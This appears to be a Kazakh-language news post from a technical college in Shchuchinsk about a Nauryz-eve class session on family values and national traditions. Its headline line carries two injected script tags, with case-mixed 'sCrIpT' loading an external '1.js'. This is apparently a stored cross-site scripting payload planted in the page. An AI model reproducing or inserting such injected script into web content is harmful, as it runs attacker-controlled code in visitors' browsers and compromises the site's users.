Текст
Наурыз – жаңару мен ізгіліктің, береке мен бірліктің мерекесі.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
17.03.2025
Наурыз – жаңару мен ізгіліктің, береке мен бірліктің мерекесі. Осы айтулы күн қарсаңында Щучинск қаласының Жоғары техникалық колледжінде «Отбасы – бақыт мекені» тақырыбында кураторлық сағат өтті. Іс-шараның мақсаты – студенттердің отбасылық құндылықтарға деген құрметін арттырып, қазақ халқының мәдени мұрасы мен дәстүрлерін тереңірек таныстыру.
Наурыз мейрамы – ата-баба салтын дәріптеп, рухани құндылықтарымызды жаңғыртатын ерекше кезең. Ол бізге бірліктің бағасын ұғындырып, ұрпақтар сабақтастығын нығайтуға мүмкіндік береді.
Просмотров: 573